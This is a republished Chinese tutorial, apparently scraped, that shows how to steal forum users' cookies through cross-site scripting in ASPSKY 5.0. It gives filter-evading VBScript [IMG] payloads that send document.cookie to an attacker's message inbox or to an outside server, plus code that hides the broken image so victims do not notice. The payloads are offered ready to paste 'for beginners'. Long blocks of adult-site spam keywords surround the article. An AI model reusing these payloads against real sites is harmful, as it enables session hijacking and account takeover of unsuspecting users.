亚洲香蕉成人av网站在线观看_欧美精品成人91久久久久久久_久久久久久久久久久亚洲_热久久视久久精品18亚洲精品_国产精自产拍久久久久久_亚洲色图国产精品_91精品国产网站_中文字幕欧美日韩精品_国产精品久久久久久亚洲调教_国产精品久久一区_性夜试看影院91社区_97在线观看视频国产_68精品久久久久久欧美_欧美精品在线观看_国产精品一区二区久久精品_欧美老女人bb

首頁 > 編程 > ASP > 正文

利用Microsoft.XMLHTTP控件發送COOKIE

2020-07-27 13:28:51
字體:
來源:轉載
供稿:網友
作者:czy <czy82@elong.com>
出處:http://www.nsfocus.net
日期:2003-09-03

(注意由于論壇會對文章中的一些字符作處理,所以最好到
http://www.chinansl.com/czy/xmlhttp.txt看文章
http://www.chinansl.com/czy/aspsky5.htm測試代碼)

    跨站腳本攻擊想必各位都已經是很熟悉了,但是得到COOKIE的時候一直有一個
問題:總是要用WINDOW.OPEN彈一個窗體出來然后發送COOKIE,這樣隱秘性
就大打折扣了。以前我想了一個在網頁中用insertAdjacentHTML方法來注入HTML語句
的辦法勉強可以作到發送COOKIE不出現IE窗口,但是在實際使用中有時會遇到IE出錯。

    沒有更好的辦法了嗎?以前在研究VBS病毒自動升級的時候用到一個Microsoft.XMLHTTP
控件(該控件是WIN98/2K上都默認自帶的東東,并且它是IE認為safe的控件!),通過它我們
可以在網頁中給網站發送http請求,可以是POST也可以是GET.

    好了思路已經到這兒來,下面我們可以實戰一下,我以ASPSKY 5.0 0320為例子。
我們知道<IMG SRC="XXXXXXX">在SRC中可以寫入vbscript:這樣的語句。。比如
<img src="vbscript:a=(msgbox(now))">,但是我們只能執行一個語句,比如
<img src="vbscript:a=(msgbox(now)):b=(msgbox(now))">這樣都將是錯誤的!
怎么辦法呢?在VBS中我們可以用EXECUTE語句,在JS中我們可以使用EVAL語!
比如:<img src="vbscript:execute(&#34a=(msgbox(now)):b=(msgbox(&#34czy&#34&#34))&#34)">
或是<img src="javascript:eval('alert(/'nsfocus/');alert(/'czy/')')">

   還沒有暈吧?上面你可能會注意到用VBS的execute語句時雙引號要換為"這是因為:
在VBS中單引號要括起字符串,必須是兩個單引號代表一個又引號,并且在雙引號內!
所以在execute語句中我們不能用單引號,而直接用"呢,在HTML進行引號匹配的時候
會和src="后的引號匹配,所以我們只能用"代替了。

   引號的問題解決了,在實際應用中ASPSKY還會對我們的代碼進行處理:
1:如果發現script字串,會在前面加上一個空格
2:如果發現http字串會認為是一個URL,并在兩邊加上<A>元素
3:如果發現空格會用&nbsp;代替

  解決問題:
1:vbscript用vbsCript代替
2:http用,&#34&#34ht&#34&#34+&#34&#34tp...代替(vbs中引號括引號里面的應用多一對,+代表連接符)
3:空格用&#32代替(注不是&#20)

   在最后就是發送COOKIE的問題:
1:控件在本地可以GET,POST任意的網站,但是在網頁中竟然只能
GET,POST當前服務器。。。。要不然IE就會說拒絕仿問!
2:cookie中不能有&等在URL中有特殊交意的字符

  解決問題:

1:只能發給當前服務器,那么可以把COOKIE發到你在論壇上的注冊的用戶的郵箱嘛:)
2:replace(document.cookie,&#34&#34&&#34&#34,&#34&#34-&#34&#34),在vbs中用
replace替換函用,在例子中我把"&"換成了"-"

問題都解決了下面是實際的例子:
動網aspsky 5.0 0320測試成功

//----------------------

[IMG]vbs&#67ript:execute(&#34dat=replace(document.cookie,&#34&#34&&#34&#34,&#34&#34-&#34&#34):set&#32http=createobject(&#34&#34Microsoft.XMLHTTP&#34&#34):http.open&#32&#34&#34GET&#34&#34,&#34&#34ht&#34&#34+&#34&#34tp://www.hd315.gov.cn/gcs/19qu/yanqing/bbs/usersms.asp?action=send&touser=czy&title=news&submit=發送&message=&#34&#34&dat,false:http.send&#34)[/IMG]

說明:把COOKIE發給CZY用戶,郵件標題叫news
//----------------------


另控件的正常用法:
<script language=vbs>
dat=document.cookie
set http=createobject("Microsoft.XMLHTTP")
http.open "POST","http://www.chinansl.com/czy/get.asp?cook="&dat,false
http.send
tt=http.responsetext
msgbox tt
</script>




  讓代碼更完美,現在COOKIE已經乖乖的在我們的郵箱里了,但是有一個小問題由于圖片不
能正常的顯示會是一個小叉,旁邊還有按此在新窗口瀏覽圖片的提示。。。這又難免會讓人
生疑。

解決思路:
一個網頁中的所有IMG元素通過document.imanges都能例舉到,并且可以設置它們的大小,當width=0時就
相當于HIDDEN了.通過比較元素的src屬性的值是否含有"ript"就可以判斷是不是我們的圖片.另外比較時
大于符用&#62代替,0用&#48代替!

代碼:
[IMG]vbs&#67ript:execute(&#34for&#32each&#32aa&#32in&#32document.images:if&#32instr(aa.src,&#34&#34ript&#34&#34)&#62&#48&#32then:aa.width=0:end&#32if:next&#34)[/IMG]


實際應用的代碼:
[IMG]vbs&#67ript:execute(&#34for&#32each&#32aa&#32in&#32document.images:if&#32instr(aa.src,&#34&#34ript&#34&#34)&#62&#48&#32then:aa.width=0:end&#32if:next:dat=replace(document.cookie,&#34&#34&&#34&#34,&#34&#34-&#34&#34):set&#32http=createobject(&#34&#34Microsoft.XMLHTTP&#34&#34):http.open&#32&#34&#34GET&#34&#34,&#34&#34ht&#34&#34+&#34&#34tp://www.hd315.gov.cn/gcs/19qu/yanqing/bbs/usersms.asp?action=send&touser=czy&title=alll&submit=發送&message=&#34&#34&dat,false:http.send&#34)[/IMG]


//-------------------方便菜鳥使用:)

[Ctrl+A 全選 注:引入外部Js需再刷新一下頁面才能執行]
發表評論 共有條評論
用戶名: 密碼:
驗證碼: 匿名發表
亚洲香蕉成人av网站在线观看_欧美精品成人91久久久久久久_久久久久久久久久久亚洲_热久久视久久精品18亚洲精品_国产精自产拍久久久久久_亚洲色图国产精品_91精品国产网站_中文字幕欧美日韩精品_国产精品久久久久久亚洲调教_国产精品久久一区_性夜试看影院91社区_97在线观看视频国产_68精品久久久久久欧美_欧美精品在线观看_国产精品一区二区久久精品_欧美老女人bb
久久夜色精品国产欧美乱| 2021国产精品视频| 欧美电影在线观看完整版| 欧美日本在线视频中文字字幕| 亚洲人成网站777色婷婷| 黑人欧美xxxx| 国产精品久久久久不卡| 国产一区二区三区四区福利| 亚洲天堂久久av| 亚洲精品视频在线播放| 91色琪琪电影亚洲精品久久| 欧美一级淫片videoshd| 欧美国产极速在线| 亚洲成av人片在线观看香蕉| 毛片精品免费在线观看| 国产69精品久久久久99| 精品久久久在线观看| 亚洲精品久久久久久久久久久久| 国产日韩专区在线| 日韩成人久久久| 亚洲色图五月天| 国产+成+人+亚洲欧洲| 久久夜精品va视频免费观看| 98精品国产高清在线xxxx天堂| 亚洲美女精品成人在线视频| 久久人人97超碰精品888| 欧美在线免费看| 中文字幕一精品亚洲无线一区| 欧美又大又硬又粗bbbbb| 亚洲高清福利视频| 久久精品国产亚洲精品2020| 国产精品福利在线| 中文字幕亚洲在线| 欧美性猛交xxxx黑人猛交| 精品香蕉一区二区三区| 亚洲黄色www| 久久久久久国产精品| 日韩在线激情视频| 51精品在线观看| 欧美日韩福利电影| 九九热精品视频| 永久555www成人免费| 亚洲精品美女视频| 国内偷自视频区视频综合| 国产午夜精品全部视频在线播放| 国产欧美精品一区二区三区-老狼| 国产免费一区二区三区香蕉精| 国产精品入口日韩视频大尺度| 国产在线999| 日韩在线视频线视频免费网站| 亚洲毛片在线看| 国产精品爽黄69| 91精品国产综合久久香蕉最新版| 55夜色66夜色国产精品视频| 色多多国产成人永久免费网站| 日韩欧美成人网| 国产日韩在线看| 亚洲色图35p| 色哟哟网站入口亚洲精品| 亚洲精品久久在线| 高清欧美性猛交xxxx| 色综合天天综合网国产成人网| 国产精品678| 狠狠久久五月精品中文字幕| 久久久99久久精品女同性| 国产成人精品免高潮费视频| 久国内精品在线| 最好看的2019年中文视频| 亚洲视频精品在线| 91福利视频在线观看| 91久久精品国产91久久性色| 亚洲精品mp4| 欧美性jizz18性欧美| 岛国av在线不卡| 国产亚洲欧美一区| 亚洲影视九九影院在线观看| www.欧美精品一二三区| 日韩美女毛茸茸| 国产精品wwww| 日韩精品在线免费| 欧美男插女视频| 日韩中文字幕在线精品| 中文字幕日韩精品在线观看| 亚洲午夜未满十八勿入免费观看全集| 成人网址在线观看| 成人亚洲欧美一区二区三区| 91av网站在线播放| 国产成人高潮免费观看精品| 97国产suv精品一区二区62| 亚洲精品电影在线| 国产精品视频网| 欧美精品电影免费在线观看| 国产精品吴梦梦| 91人人爽人人爽人人精88v| 九九视频直播综合网| 欧美日韩国产色| 日韩电影免费观看在线观看| 激情久久av一区av二区av三区| 日韩欧美国产中文字幕| 国产精品福利在线观看网址| 国产精品网红福利| 亚洲色图激情小说| 国产精品av网站| 国产精品7m视频| 欧洲美女7788成人免费视频| 久久久精品一区二区| 欧美日韩国产中文精品字幕自在自线| 亚洲欧洲国产一区| 中国日韩欧美久久久久久久久| 亚洲欧美激情在线视频| 日韩一区二区在线视频| 岛国av在线不卡| 久久久久免费视频| 国产精品电影观看| 国产在线观看精品一区二区三区| 欧美自拍大量在线观看| 欧美久久精品午夜青青大伊人| 一二美女精品欧洲| 日本aⅴ大伊香蕉精品视频| 日韩在线欧美在线| 另类专区欧美制服同性| 成人激情视频在线| 亚洲激情第一页| 91精品国产99久久久久久| 国产精品久久久久免费a∨| 亚洲高清在线观看| 中文字幕在线观看日韩| 国产精选久久久久久| 在线国产精品播放| 国产精品亚发布| 欧美激情亚洲综合一区| 亚洲欧美制服中文字幕| 国产精品黄色影片导航在线观看| 在线成人一区二区| 亚洲已满18点击进入在线看片| 国产成人综合久久| 亚洲精品日韩久久久| 欧美午夜视频在线观看| 色婷婷综合久久久久| 一区二区欧美在线| 成年无码av片在线| 欧美日韩一区二区精品| 57pao成人永久免费视频| 欧美大尺度在线观看| 国产人妖伪娘一区91| 国产精品小说在线| 日本韩国在线不卡| 91精品久久久久久久久久久久久久| 91中文字幕在线| 中文字幕精品一区久久久久| 欧美性猛交xxxx免费看| 国产精品青草久久久久福利99| 欧美一区二区大胆人体摄影专业网站| 国产精品入口日韩视频大尺度| 奇门遁甲1982国语版免费观看高清| 国产成人激情小视频| 国产精品18久久久久久首页狼| 国产v综合ⅴ日韩v欧美大片| 日本三级韩国三级久久| 国产精品成人一区二区三区吃奶| 国产精品亚洲第一区| 国产91热爆ts人妖在线| 国产精品视频一区国模私拍| 尤物yw午夜国产精品视频|